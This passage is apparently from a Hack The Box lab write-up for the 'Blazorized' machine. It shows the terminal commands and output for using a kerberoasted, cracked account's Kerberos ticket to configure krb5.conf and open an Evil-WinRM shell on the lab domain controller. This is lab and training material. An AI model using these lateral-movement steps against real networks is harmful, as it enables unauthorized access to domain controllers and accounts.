WinRM
Successfully compromised the rsa_4810 account via Kerberoasting and the cracked credential hash has been validated by generating a TGT
┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ echo -e '[realms]\n\n\tBLAZORIZED.HTB = {\n\t\tkdc = dc1.blazorized.htb\n\t}' | sudo tee /etc/krb5.conf
[realms]
BLAZORIZED.HTB = {
kdc = dc1.blazorized.htb
}Setting up the /etc/krb5.conf file
┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ KRB5CCNAME=rsa_4810@dc1.blazorized.htb.ccache evil-winrm -i dc1.blazorized.htb -r BLAZORIZED.HTB
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> whoami
blazorized\rsa_4810
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> hostname
DC1
*Evil-WinRM* PS C:\Users\RSA_4810\Documents> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . :
IPv4 Address. . . . . . . . . . . : 10.10.11.22
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : 10.10.10.2Lateral Movement made to the rsa_4810 account via WinRM